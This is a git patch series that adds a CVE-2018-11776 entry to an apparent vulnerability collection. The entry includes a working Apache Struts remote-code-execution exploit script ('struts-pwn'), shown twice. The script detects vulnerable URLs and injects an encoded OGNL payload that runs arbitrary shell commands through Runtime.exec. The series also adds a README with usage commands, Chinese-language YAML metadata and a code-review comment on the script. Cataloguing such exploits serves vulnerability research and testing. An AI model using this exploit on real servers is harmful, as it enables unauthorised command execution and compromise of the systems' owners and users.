From c95f537ca8da6368e2c5172f627da5cd5b89898b Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=E6=9D=8E=E5=A8=81=E7=BF=B0?=
Date: Fri, 7 Apr 2023 06:58:47 +0000
Subject: [PATCH 1/9] add cve/apache-Struts/2018/CVE-2018.
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
Signed-off-by: 李威翰
---
cve/apache-Struts/2018/CVE-2018-11776/README.md | 0
1 file changed, 0 insertions(+), 0 deletions(-)
create mode 100644 cve/apache-Struts/2018/CVE-2018-11776/README.md
diff --git a/cve/apache-Struts/2018/CVE-2018-11776/README.md b/cve/apache-Struts/2018/CVE-2018-11776/README.md
new file mode 100644
index 00000000..e69de29b
-- 
Gitee
From 46de3056ba1f1037a1c6fbfb9bca8cf668a560b7 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=E6=9D=8E=E5=A8=81=E7=BF=B0?=
Date: Fri, 7 Apr 2023 06:59:37 +0000
Subject: [PATCH 2/9] add cve/apache-Struts/2018.
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
Signed-off-by: 李威翰
---
cve/apache-Struts/2018/yaml/CVE-2018-11776.yaml | 0
1 file changed, 0 insertions(+), 0 deletions(-)
create mode 100644 cve/apache-Struts/2018/yaml/CVE-2018-11776.yaml
diff --git a/cve/apache-Struts/2018/yaml/CVE-2018-11776.yaml b/cve/apache-Struts/2018/yaml/CVE-2018-11776.yaml
new file mode 100644
index 00000000..e69de29b
-- 
Gitee
From 54385068cdd8ea0edbf20edf785df0fb047fee97 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=E6=9D=8E=E5=A8=81=E7=BF=B0?=
Date: Fri, 7 Apr 2023 07:02:02 +0000
Subject: [PATCH 3/9] add py
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
Signed-off-by: 李威翰
---
.../2018/CVE-2018-11776/struts-pwn.py | 226 ++++++++++++++++++
1 file changed, 226 insertions(+)
create mode 100644 cve/apache-Struts/2018/CVE-2018-11776/struts-pwn.py
diff --git a/cve/apache-Struts/2018/CVE-2018-11776/struts-pwn.py b/cve/apache-Struts/2018/CVE-2018-11776/struts-pwn.py
new file mode 100644
index 00000000..edbf3c5f
--- /dev/null
+++ b/cve/apache-Struts/2018/CVE-2018-11776/struts-pwn.py 
@@ -0,0 +1,226 @@ +#!/usr/bin/env python3 +# coding=utf-8 +# ***************************************************** +# struts-pwn: Apache Struts CVE-2018-11776 Exploit +# Author: +# Mazin Ahmed +# This code uses a payload from: +# https://github.com/jas502n/St2-057 +# ***************************************************** + +import argparse +import random +import requests +import sys +try: + from urllib import parse as urlparse +except ImportError: + import urlparse + +# Disable SSL warnings +try: + import requests.packages.urllib3 + requests.packages.urllib3.disable_warnings() +except Exception: + pass + +if len(sys.argv) <= 1: + print('[*] CVE: 2018-11776 - Apache Struts2 S2-057') + print('[*] Struts-PWN - @mazen160') + print('\n%s -h for help.' % (sys.argv[0])) + exit(0) + + +parser = argparse.ArgumentParser() +parser.add_argument("-u", "--url", + dest="url", + help="Check a single URL.", + action='store') +parser.add_argument("-l", "--list", + dest="usedlist", + help="Check a list of URLs.", + action='store') +parser.add_argument("-c", "--cmd", + dest="cmd", + help="Command to execute. (Default: 'id')", + action='store', + default='id') +parser.add_argument("--exploit", + dest="do_exploit", + help="Exploit.", + action='store_true') + + +args = parser.parse_args() +url = args.url if args.url else None +usedlist = args.usedlist if args.usedlist else None +cmd = args.cmd if args.cmd else None +do_exploit = args.do_exploit if args.do_exploit else None + +headers = { + 'User-Agent': 'struts-pwn (https://github.com/mazen160/struts-pwn_CVE-2018-11776)', + # 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36', + 'Accept': '*/*' +} +timeout = 3 + + +def parse_url(url): + """ + Parses the URL. 
+ """ + + # url: http://example.com/demo/struts2-showcase/index.action + + url = url.replace('#', '%23') + url = url.replace(' ', '%20') + + if ('://' not in url): + url = str("http://") + str(url) + scheme = urlparse.urlparse(url).scheme + + # Site: http://example.com + site = scheme + '://' + urlparse.urlparse(url).netloc + + # FilePath: /demo/struts2-showcase/index.action + file_path = urlparse.urlparse(url).path + if (file_path == ''): + file_path = '/' + + # Filename: index.action + try: + filename = url.split('/')[-1] + except IndexError: + filename = '' + + # File Dir: /demo/struts2-showcase/ + file_dir = file_path.rstrip(filename) + if (file_dir == ''): + file_dir = '/' + + return({"site": site, + "file_dir": file_dir, + "filename": filename}) + + +def build_injection_inputs(url): + """ + Builds injection inputs for the check. + """ + + parsed_url = parse_url(url) + injection_inputs = [] + url_directories = parsed_url["file_dir"].split("/") + + try: + url_directories.remove("") + except ValueError: + pass + + for i in range(len(url_directories)): + injection_entry = "/".join(url_directories[:i]) + + if not injection_entry.startswith("/"): + injection_entry = "/%s" % (injection_entry) + + if not injection_entry.endswith("/"): + injection_entry = "%s/" % (injection_entry) + + injection_entry += "{{INJECTION_POINT}}/" # It will be renderred later with the payload. 
+ injection_entry += parsed_url["filename"] + + injection_inputs.append(injection_entry) + + return(injection_inputs) + + +def check(url): + random_value = int(''.join(random.choice('0123456789') for i in range(2))) + multiplication_value = random_value * random_value + injection_points = build_injection_inputs(url) + parsed_url = parse_url(url) + print("[%] Checking for CVE-2018-11776") + print("[*] URL: %s" % (url)) + print("[*] Total of Attempts: (%s)" % (len(injection_points))) + attempts_counter = 0 + + for injection_point in injection_points: + attempts_counter += 1 + print("[%s/%s]" % (attempts_counter, len(injection_points))) + testing_url = "%s%s" % (parsed_url["site"], injection_point) + testing_url = testing_url.replace("{{INJECTION_POINT}}", "${{%s*%s}}" % (random_value, random_value)) + try: + resp = requests.get(testing_url, headers=headers, verify=False, timeout=timeout, allow_redirects=False) + except Exception as e: + print("EXCEPTION::::--> " + str(e)) + continue + if "Location" in resp.headers.keys(): + if str(multiplication_value) in resp.headers['Location']: + print("[*] Status: Vulnerable!") + return(injection_point) + print("[*] Status: Not Affected.") + return(None) + + +def exploit(url, cmd): + parsed_url = parse_url(url) + + injection_point = check(url) + if injection_point is None: + print("[%] Target is not vulnerable.") + return(0) + print("[%] Exploiting...") + + payload = """%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27{0}%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D""".format(cmd) + + testing_url = "%s%s" % (parsed_url["site"], injection_point) + testing_url = 
testing_url.replace("{{INJECTION_POINT}}", payload) + + try: + resp = requests.get(testing_url, headers=headers, verify=False, timeout=timeout, allow_redirects=False) + except Exception as e: + print("EXCEPTION::::--> " + str(e)) + return(1) + + print("[%] Response:") + print(resp.text) + return(0) + + +def main(url=url, usedlist=usedlist, cmd=cmd, do_exploit=do_exploit): + if url: + if not do_exploit: + check(url) + else: + exploit(url, cmd) + + if usedlist: + URLs_List = [] + try: + f_file = open(str(usedlist), "r") + URLs_List = f_file.read().replace("\r", "").split("\n") + try: + URLs_List.remove("") + except ValueError: + pass + f_file.close() + except Exception as e: + print("Error: There was an error in reading list file.") + print("Exception: " + str(e)) + exit(1) + for url in URLs_List: + if not do_exploit: + check(url) + else: + exploit(url, cmd) + + print("[%] Done.") + + +if __name__ == "__main__": + try: + main(url=url, usedlist=usedlist, cmd=cmd, do_exploit=do_exploit) + except KeyboardInterrupt: + print("\nKeyboardInterrupt Detected.") + print("Exiting...") + exit(0) -- Gitee From 5ca01f5aaac4ebad6936e1ff71d5a2d01dfa4594 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E6=9D=8E=E5=A8=81=E7=BF=B0?= Date: Fri, 7 Apr 2023 07:03:01 +0000 Subject: [PATCH 4/9] add cve-2018-11776.py MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 李威翰 --- .../2018/CVE-2018-11776/cve-2018-11776.py | 226 ++++++++++++++++++ 1 file changed, 226 insertions(+) create mode 100644 cve/apache-Struts/2018/CVE-2018-11776/cve-2018-11776.py diff --git a/cve/apache-Struts/2018/CVE-2018-11776/cve-2018-11776.py b/cve/apache-Struts/2018/CVE-2018-11776/cve-2018-11776.py new file mode 100644 index 00000000..edbf3c5f --- /dev/null +++ b/cve/apache-Struts/2018/CVE-2018-11776/cve-2018-11776.py 
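Review bot: In `main`, the URL list is read through a bare `open()`/`close()` pair, so if `read()` raises the handle is never closed, and the handler then calls the site-module helper `exit(1)` although `sys` is already imported; replace the open/read lines with `with open(str(usedlist), "r") as f_file:` and `URLs_List = f_file.read().replace("\r", "").split("\n")`, drop the explicit `f_file.close()`, and use `sys.exit(1)` (the other `exit()` calls in the file have the same problem). In `parse_url`, `file_path.rstrip(filename)` strips a character set rather than a suffix; it appears to yield the directory only because stripping stops at the `/` separator that `filename` can never contain, which deserves a comment such as `# rstrip() removes a char set, not a suffix; it stops at the '/' that filename cannot contain`. The header comment and the `sys.argv[0]` help banner still describe the tool as struts-pwn and the README added in patch 7 documents `python struts-pwn.py ...`, but patch 5 deletes struts-pwn.py and the surviving copy from patch 4 is named cve-2018-11776.py, so the documented invocation points at a file that no longer exists. The identical hunk in patch 4 (cve-2018-11776.py) carries the same issues.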
@@ -0,0 +1,226 @@ +#!/usr/bin/env python3 +# coding=utf-8 +# ***************************************************** +# struts-pwn: Apache Struts CVE-2018-11776 Exploit +# Author: +# Mazin Ahmed +# This code uses a payload from: +# https://github.com/jas502n/St2-057 +# ***************************************************** + +import argparse +import random +import requests +import sys +try: + from urllib import parse as urlparse +except ImportError: + import urlparse + +# Disable SSL warnings +try: + import requests.packages.urllib3 + requests.packages.urllib3.disable_warnings() +except Exception: + pass + +if len(sys.argv) <= 1: + print('[*] CVE: 2018-11776 - Apache Struts2 S2-057') + print('[*] Struts-PWN - @mazen160') + print('\n%s -h for help.' % (sys.argv[0])) + exit(0) + + +parser = argparse.ArgumentParser() +parser.add_argument("-u", "--url", + dest="url", + help="Check a single URL.", + action='store') +parser.add_argument("-l", "--list", + dest="usedlist", + help="Check a list of URLs.", + action='store') +parser.add_argument("-c", "--cmd", + dest="cmd", + help="Command to execute. (Default: 'id')", + action='store', + default='id') +parser.add_argument("--exploit", + dest="do_exploit", + help="Exploit.", + action='store_true') + + +args = parser.parse_args() +url = args.url if args.url else None +usedlist = args.usedlist if args.usedlist else None +cmd = args.cmd if args.cmd else None +do_exploit = args.do_exploit if args.do_exploit else None + +headers = { + 'User-Agent': 'struts-pwn (https://github.com/mazen160/struts-pwn_CVE-2018-11776)', + # 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36', + 'Accept': '*/*' +} +timeout = 3 + + +def parse_url(url): + """ + Parses the URL. 
+ """ + + # url: http://example.com/demo/struts2-showcase/index.action + + url = url.replace('#', '%23') + url = url.replace(' ', '%20') + + if ('://' not in url): + url = str("http://") + str(url) + scheme = urlparse.urlparse(url).scheme + + # Site: http://example.com + site = scheme + '://' + urlparse.urlparse(url).netloc + + # FilePath: /demo/struts2-showcase/index.action + file_path = urlparse.urlparse(url).path + if (file_path == ''): + file_path = '/' + + # Filename: index.action + try: + filename = url.split('/')[-1] + except IndexError: + filename = '' + + # File Dir: /demo/struts2-showcase/ + file_dir = file_path.rstrip(filename) + if (file_dir == ''): + file_dir = '/' + + return({"site": site, + "file_dir": file_dir, + "filename": filename}) + + +def build_injection_inputs(url): + """ + Builds injection inputs for the check. + """ + + parsed_url = parse_url(url) + injection_inputs = [] + url_directories = parsed_url["file_dir"].split("/") + + try: + url_directories.remove("") + except ValueError: + pass + + for i in range(len(url_directories)): + injection_entry = "/".join(url_directories[:i]) + + if not injection_entry.startswith("/"): + injection_entry = "/%s" % (injection_entry) + + if not injection_entry.endswith("/"): + injection_entry = "%s/" % (injection_entry) + + injection_entry += "{{INJECTION_POINT}}/" # It will be renderred later with the payload. 
+ injection_entry += parsed_url["filename"] + + injection_inputs.append(injection_entry) + + return(injection_inputs) + + +def check(url): + random_value = int(''.join(random.choice('0123456789') for i in range(2))) + multiplication_value = random_value * random_value + injection_points = build_injection_inputs(url) + parsed_url = parse_url(url) + print("[%] Checking for CVE-2018-11776") + print("[*] URL: %s" % (url)) + print("[*] Total of Attempts: (%s)" % (len(injection_points))) + attempts_counter = 0 + + for injection_point in injection_points: + attempts_counter += 1 + print("[%s/%s]" % (attempts_counter, len(injection_points))) + testing_url = "%s%s" % (parsed_url["site"], injection_point) + testing_url = testing_url.replace("{{INJECTION_POINT}}", "${{%s*%s}}" % (random_value, random_value)) + try: + resp = requests.get(testing_url, headers=headers, verify=False, timeout=timeout, allow_redirects=False) + except Exception as e: + print("EXCEPTION::::--> " + str(e)) + continue + if "Location" in resp.headers.keys(): + if str(multiplication_value) in resp.headers['Location']: + print("[*] Status: Vulnerable!") + return(injection_point) + print("[*] Status: Not Affected.") + return(None) + + +def exploit(url, cmd): + parsed_url = parse_url(url) + + injection_point = check(url) + if injection_point is None: + print("[%] Target is not vulnerable.") + return(0) + print("[%] Exploiting...") + + payload = """%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27{0}%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D""".format(cmd) + + testing_url = "%s%s" % (parsed_url["site"], injection_point) + testing_url = 
testing_url.replace("{{INJECTION_POINT}}", payload) + + try: + resp = requests.get(testing_url, headers=headers, verify=False, timeout=timeout, allow_redirects=False) + except Exception as e: + print("EXCEPTION::::--> " + str(e)) + return(1) + + print("[%] Response:") + print(resp.text) + return(0) + + +def main(url=url, usedlist=usedlist, cmd=cmd, do_exploit=do_exploit): + if url: + if not do_exploit: + check(url) + else: + exploit(url, cmd) + + if usedlist: + URLs_List = [] + try: + f_file = open(str(usedlist), "r") + URLs_List = f_file.read().replace("\r", "").split("\n") + try: + URLs_List.remove("") + except ValueError: + pass + f_file.close() + except Exception as e: + print("Error: There was an error in reading list file.") + print("Exception: " + str(e)) + exit(1) + for url in URLs_List: + if not do_exploit: + check(url) + else: + exploit(url, cmd) + + print("[%] Done.") + + +if __name__ == "__main__": + try: + main(url=url, usedlist=usedlist, cmd=cmd, do_exploit=do_exploit) + except KeyboardInterrupt: + print("\nKeyboardInterrupt Detected.") + print("Exiting...") + exit(0) -- Gitee From 40ac2342a6f0c72930820b0ad83ec81452b9a1bc Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E6=9D=8E=E5=A8=81=E7=BF=B0?= Date: Fri, 7 Apr 2023 07:03:12 +0000 Subject: [PATCH 5/9] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cve/?= =?UTF-8?q?apache-Struts/2018/CVE-2018-11776/struts-pwn.py?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../2018/CVE-2018-11776/struts-pwn.py | 226 ------------------ 1 file changed, 226 deletions(-) delete mode 100644 cve/apache-Struts/2018/CVE-2018-11776/struts-pwn.py diff --git a/cve/apache-Struts/2018/CVE-2018-11776/struts-pwn.py b/cve/apache-Struts/2018/CVE-2018-11776/struts-pwn.py deleted file mode 100644 index edbf3c5f..00000000 --- a/cve/apache-Struts/2018/CVE-2018-11776/struts-pwn.py +++ /dev/null 
@@ -1,226 +0,0 @@ -#!/usr/bin/env python3 -# coding=utf-8 -# ***************************************************** -# struts-pwn: Apache Struts CVE-2018-11776 Exploit -# Author: -# Mazin Ahmed -# This code uses a payload from: -# https://github.com/jas502n/St2-057 -# ***************************************************** - -import argparse -import random -import requests -import sys -try: - from urllib import parse as urlparse -except ImportError: - import urlparse - -# Disable SSL warnings -try: - import requests.packages.urllib3 - requests.packages.urllib3.disable_warnings() -except Exception: - pass - -if len(sys.argv) <= 1: - print('[*] CVE: 2018-11776 - Apache Struts2 S2-057') - print('[*] Struts-PWN - @mazen160') - print('\n%s -h for help.' % (sys.argv[0])) - exit(0) - - -parser = argparse.ArgumentParser() -parser.add_argument("-u", "--url", - dest="url", - help="Check a single URL.", - action='store') -parser.add_argument("-l", "--list", - dest="usedlist", - help="Check a list of URLs.", - action='store') -parser.add_argument("-c", "--cmd", - dest="cmd", - help="Command to execute. (Default: 'id')", - action='store', - default='id') -parser.add_argument("--exploit", - dest="do_exploit", - help="Exploit.", - action='store_true') - - -args = parser.parse_args() -url = args.url if args.url else None -usedlist = args.usedlist if args.usedlist else None -cmd = args.cmd if args.cmd else None -do_exploit = args.do_exploit if args.do_exploit else None - -headers = { - 'User-Agent': 'struts-pwn (https://github.com/mazen160/struts-pwn_CVE-2018-11776)', - # 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36', - 'Accept': '*/*' -} -timeout = 3 - - -def parse_url(url): - """ - Parses the URL. 
- """ - - # url: http://example.com/demo/struts2-showcase/index.action - - url = url.replace('#', '%23') - url = url.replace(' ', '%20') - - if ('://' not in url): - url = str("http://") + str(url) - scheme = urlparse.urlparse(url).scheme - - # Site: http://example.com - site = scheme + '://' + urlparse.urlparse(url).netloc - - # FilePath: /demo/struts2-showcase/index.action - file_path = urlparse.urlparse(url).path - if (file_path == ''): - file_path = '/' - - # Filename: index.action - try: - filename = url.split('/')[-1] - except IndexError: - filename = '' - - # File Dir: /demo/struts2-showcase/ - file_dir = file_path.rstrip(filename) - if (file_dir == ''): - file_dir = '/' - - return({"site": site, - "file_dir": file_dir, - "filename": filename}) - - -def build_injection_inputs(url): - """ - Builds injection inputs for the check. - """ - - parsed_url = parse_url(url) - injection_inputs = [] - url_directories = parsed_url["file_dir"].split("/") - - try: - url_directories.remove("") - except ValueError: - pass - - for i in range(len(url_directories)): - injection_entry = "/".join(url_directories[:i]) - - if not injection_entry.startswith("/"): - injection_entry = "/%s" % (injection_entry) - - if not injection_entry.endswith("/"): - injection_entry = "%s/" % (injection_entry) - - injection_entry += "{{INJECTION_POINT}}/" # It will be renderred later with the payload. 
- injection_entry += parsed_url["filename"] - - injection_inputs.append(injection_entry) - - return(injection_inputs) - - -def check(url): - random_value = int(''.join(random.choice('0123456789') for i in range(2))) - multiplication_value = random_value * random_value - injection_points = build_injection_inputs(url) - parsed_url = parse_url(url) - print("[%] Checking for CVE-2018-11776") - print("[*] URL: %s" % (url)) - print("[*] Total of Attempts: (%s)" % (len(injection_points))) - attempts_counter = 0 - - for injection_point in injection_points: - attempts_counter += 1 - print("[%s/%s]" % (attempts_counter, len(injection_points))) - testing_url = "%s%s" % (parsed_url["site"], injection_point) - testing_url = testing_url.replace("{{INJECTION_POINT}}", "${{%s*%s}}" % (random_value, random_value)) - try: - resp = requests.get(testing_url, headers=headers, verify=False, timeout=timeout, allow_redirects=False) - except Exception as e: - print("EXCEPTION::::--> " + str(e)) - continue - if "Location" in resp.headers.keys(): - if str(multiplication_value) in resp.headers['Location']: - print("[*] Status: Vulnerable!") - return(injection_point) - print("[*] Status: Not Affected.") - return(None) - - -def exploit(url, cmd): - parsed_url = parse_url(url) - - injection_point = check(url) - if injection_point is None: - print("[%] Target is not vulnerable.") - return(0) - print("[%] Exploiting...") - - payload = """%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27{0}%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D""".format(cmd) - - testing_url = "%s%s" % (parsed_url["site"], injection_point) - testing_url = 
testing_url.replace("{{INJECTION_POINT}}", payload) - - try: - resp = requests.get(testing_url, headers=headers, verify=False, timeout=timeout, allow_redirects=False) - except Exception as e: - print("EXCEPTION::::--> " + str(e)) - return(1) - - print("[%] Response:") - print(resp.text) - return(0) - - -def main(url=url, usedlist=usedlist, cmd=cmd, do_exploit=do_exploit): - if url: - if not do_exploit: - check(url) - else: - exploit(url, cmd) - - if usedlist: - URLs_List = [] - try: - f_file = open(str(usedlist), "r") - URLs_List = f_file.read().replace("\r", "").split("\n") - try: - URLs_List.remove("") - except ValueError: - pass - f_file.close() - except Exception as e: - print("Error: There was an error in reading list file.") - print("Exception: " + str(e)) - exit(1) - for url in URLs_List: - if not do_exploit: - check(url) - else: - exploit(url, cmd) - - print("[%] Done.") - - -if __name__ == "__main__": - try: - main(url=url, usedlist=usedlist, cmd=cmd, do_exploit=do_exploit) - except KeyboardInterrupt: - print("\nKeyboardInterrupt Detected.") - print("Exiting...") - exit(0) -- Gitee From 90a543a09a863da4a8e6cd707699354fc48c955b Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E6=9D=8E=E5=A8=81=E7=BF=B0?= Date: Fri, 7 Apr 2023 07:03:24 +0000 Subject: [PATCH 6/9] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cve/?= =?UTF-8?q?apache-Struts/2018/CVE-2018-11776/README.md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/apache-Struts/2018/CVE-2018-11776/README.md | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/apache-Struts/2018/CVE-2018-11776/README.md diff --git a/cve/apache-Struts/2018/CVE-2018-11776/README.md b/cve/apache-Struts/2018/CVE-2018-11776/README.md deleted file mode 100644 index e69de29b..00000000 -- Gitee From 252661bfba790e081d4c3537e21c3dc4097297fa Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?=E6=9D=8E=E5=A8=81=E7=BF=B0?= Date: Fri, 7 Apr 2023 07:03:45 +0000 Subject: [PATCH 7/9] add readme MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 李威翰 --- .../2018/CVE-2018-11776/LICENSE.txt | 22 +++++++++ .../2018/CVE-2018-11776/README.md | 48 +++++++++++++++++++ .../2018/CVE-2018-11776/requirements.txt | 1 + 3 files changed, 71 insertions(+) create mode 100644 cve/apache-Struts/2018/CVE-2018-11776/LICENSE.txt create mode 100644 cve/apache-Struts/2018/CVE-2018-11776/README.md create mode 100644 cve/apache-Struts/2018/CVE-2018-11776/requirements.txt diff --git a/cve/apache-Struts/2018/CVE-2018-11776/LICENSE.txt b/cve/apache-Struts/2018/CVE-2018-11776/LICENSE.txt new file mode 100644 index 00000000..017f1bd2 --- /dev/null +++ b/cve/apache-Struts/2018/CVE-2018-11776/LICENSE.txt @@ -0,0 +1,22 @@ +The MIT License (MIT) + +Copyright (c) 2018 Mazin Ahmed + +Permission is hereby granted, free of charge, to any person obtaining a copy +of this software and associated documentation files (the "Software"), to deal +in the Software without restriction, including without limitation the rights +to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +copies of the Software, and to permit persons to whom the Software is +furnished to do so, subject to the following conditions: + +The above copyright notice and this permission notice shall be included in all +copies or substantial portions of the Software. + +THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +SOFTWARE. + 
diff --git a/cve/apache-Struts/2018/CVE-2018-11776/README.md b/cve/apache-Struts/2018/CVE-2018-11776/README.md
new file mode 100644
index 00000000..34ca25d9
--- /dev/null
+++ b/cve/apache-Struts/2018/CVE-2018-11776/README.md
@@ -0,0 +1,48 @@ +*struts-pwn - CVE-2018-11776 Exploit* +============ + +### An exploit for Apache Struts CVE-2018-11776 ### + + +# **Usage** # + +## Check if the vulnerability exists against a single URL. ## +`python struts-pwn.py --url 'http://example.com/demo/struts2-showcase/index.action'` + +## Check if the vulnerability exists against a list of URLs. ## +`python struts-pwn.py --list 'urls.txt'` + +## Exploit a single URL. ## +`python struts-pwn.py --exploit --url 'http://example.com/demo/struts2-showcase/index.action' -c 'id'` + +## Exploit a list of URLs. ## +`python struts-pwn.py --exploit --list 'urls.txt' -c 'id'` + + +# **Demo** # +![Demo](https://github.com/mazen160/public/raw/master/static/images/struts-pwn_CVE-2018-11776_Demo.gif) + +![Screenshot 1](https://github.com/mazen160/public/raw/master/static/images/struts-pwn_CVE-2018-11776_Screenshot_1.png) + +![Screenshot 2](https://github.com/mazen160/public/raw/master/static/images/struts-pwn_CVE-2018-11776_Screenshot_2.png) + + +# **Requirements** # +* Python2 or Python3 +* requests + + +# **Legal Disclaimer** # +This project is made for educational and ethical testing purposes only. Usage of struts-pwn for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program. + + +# **License** # +The project is licensed under MIT License. + + +# **Author** # +*Mazin Ahmed* +* Website: [https://mazinahmed.net](https://mazinahmed.net) +* Email: *mazin AT mazinahmed DOT net* +* Twitter: [https://twitter.com/mazen160](https://twitter.com/mazen160) +* Linkedin: [http://linkedin.com/in/infosecmazinahmed](http://linkedin.com/in/infosecmazinahmed) diff --git a/cve/apache-Struts/2018/CVE-2018-11776/requirements.txt b/cve/apache-Struts/2018/CVE-2018-11776/requirements.txt new file mode 100644 index 00000000..f2293605 --- /dev/null 
+++ b/cve/apache-Struts/2018/CVE-2018-11776/requirements.txt
@@ -0,0 +1 @@
+requests
-- 
Gitee
From f66e22650e42e591aff87f8b7d5ba0965f79dcf4 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=E6=9D=8E=E5=A8=81=E7=BF=B0?=
Date: Fri, 7 Apr 2023 07:09:19 +0000
Subject: [PATCH 8/9] update cve/apache-Struts/2018/yaml/CVE-2018-11776.yaml.
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
Signed-off-by: 李威翰
---
.../2018/yaml/CVE-2018-11776.yaml | 20 +++++++++++++++++++
1 file changed, 20 insertions(+)
diff --git a/cve/apache-Struts/2018/yaml/CVE-2018-11776.yaml b/cve/apache-Struts/2018/yaml/CVE-2018-11776.yaml
index e69de29b..d66c1fe0 100644
--- a/cve/apache-Struts/2018/yaml/CVE-2018-11776.yaml
+++ b/cve/apache-Struts/2018/yaml/CVE-2018-11776.yaml
@@ -0,0 +1,20 @@
+id: CVE-2018-11776
+source: https://github.com/mazen160/struts-pwn_CVE-2018-11776
+info:
+ name: Apache Struts是一个用于构建基于Java的web应用程序的模型-视图-控制器(MVC)框架。
+ severity: high
+ description:
+ Apache Struts 版本 2.3 到 2.3.34 和 2.5 到 2.5.16 在 alwaysSelectFullNamespace 为 true 时(由用户或像 Convention 插件这样的插件)遭受可能的远程代码执行,然后: 结果在没有命名空间的情况下使用,同时,它的上层包没有或通配符命名空间,类似于结果,当使用没有设置值和操作的 url 标签时,同样的可能性同时, 它的上层包没有或通配符命名空间。
+ scope-of-influence:
+ Struts 2.3.1 - Struts 2.3.34
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2018-11776
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 8.1
+ cve-id: CVE-2018-11776
+ cwe-id: CWE-20
+ cnvd-id: None
+ kve-id: None
+ tags:
+ - 远程命令执行
\ No newline at end of file
-- 
Gitee
From 0db7783334bf9883ad7cc25a13d879403ff7752e Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=E6=9D=8E=E5=A8=81=E7=BF=B0?=
Date: Fri, 7 Apr 2023 09:18:02 +0000
Subject: [PATCH 9/9] update other_list.yaml.
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
Signed-off-by: 李威翰
---
other_list.yaml | 2 ++
1 file changed, 2 insertions(+)
diff --git a/other_list.yaml b/other_list.yaml
index 545fab5b..a83a830a 100644
